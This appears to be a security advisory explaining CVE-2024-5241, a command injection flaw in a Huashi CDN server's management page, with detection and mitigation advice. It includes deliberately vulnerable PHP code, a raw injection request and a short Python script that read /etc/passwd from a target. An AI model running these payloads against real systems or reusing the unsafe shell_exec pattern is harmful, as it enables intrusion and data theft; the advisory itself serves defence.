CVE-2024-5241 - Critical Command Injection in Huashi Private Cloud CDN Live Streaming Acceleration Server Explained

A critical vulnerability, CVE-2024-5241, was found in the Huashi Private Cloud CDN Live Streaming Acceleration Server (versions up to 20240520). This security flaw allows a remote attacker to execute system commands on the server by exploiting an input field in /manager/ipconfig_new.php. The attack is possible due to improper input validation for the dev parameter, leading to OS command injection. A working public exploit is available, so urgent action is advised.

What Is CVE-2024-5241?

CVE-2024-5241 is a command injection vulnerability. It lets attackers send specially crafted HTTP requests to the Huashi Private Cloud management panel, which causes the server to run arbitrary system commands.

Affected Versions: Up to 20240520

- Vulnerable File: /manager/ipconfig_new.php

How Does the Vulnerability Work?

The vulnerable PHP file (ipconfig_new.php) uses the value from the dev parameter directly in a system command without sanitizing user input. This allows malicious users to inject shell commands.

Example Vulnerable Code

<?php
// Sample vulnerable code in ipconfig_new.php

$dev = $_GET['dev'];
$output = shell_exec("ifconfig " . $dev);
// Renders output
echo $output;
?>

If dev is set to a device name (e.g., eth), the command works fine. But if an attacker sends something like eth; whoami, the server runs ifconfig eth; whoami, leaking sensitive info.

An attacker can exploit this vulnerability with a simple HTTP request

GET /manager/ipconfig_new.php?dev=eth;cat%20/etc/passwd HTTP/1.1
Host: victim.com

This request runs cat /etc/passwd on the server, exposing user account details.

Example Exploit Script (Python)

import requests

url = 'http://victim.com/manager/ipconfig_new.php';
payload = 'eth;cat /etc/passwd'
params = {'dev': payload}

r = requests.get(url, params=params)
print(r.text)  # Will include /etc/passwd content if vulnerable

What Is the Risk?

- Remote Code Execution: Gain shell access, install malware, mine crypto, steal data, or pivot deeper.

Detection

Check web server logs for suspicious requests to /manager/ipconfig_new.php?dev=... with unusual shell characters (;, |, &&, etc.).

Huashi has not released an official patch at the time of writing. To secure your systems

1. Restrict Access: Block public access to /manager/ipconfig_new.php using firewall or web server rules.
2. Update: Watch for security updates from the vendor here: Huashi Official Website.
3. Input Validation: If you maintain code, sanitize all user input using PHP’s escapeshellarg() and filter input strictly.

References & Official Resources

- CVE-2024-5241 Entry at Vuldb
- Announcement on VulDB
- Exploit-DB reference (if available)
- Huashi Products Page
- About Command Injection

Conclusion

CVE-2024-5241 is extremely dangerous, as it grants remote attackers the ability to run any system command on vulnerable servers. All admins using Huashi Private Cloud CDN Live Streaming Acceleration Server must take this issue seriously—restrict access immediately and monitor for updates.

Stay safe, and always sanitize user inputs!

*This article provides original and simple guidance to help users understand and mitigate the risk from CVE-2024-5241. If you run Huashi Private Cloud products, review your infrastructure now.*

Timeline

Published on: 05/23/2024 07:15:10 UTC
Last modified on: 08/01/2024 21:03:11 UTC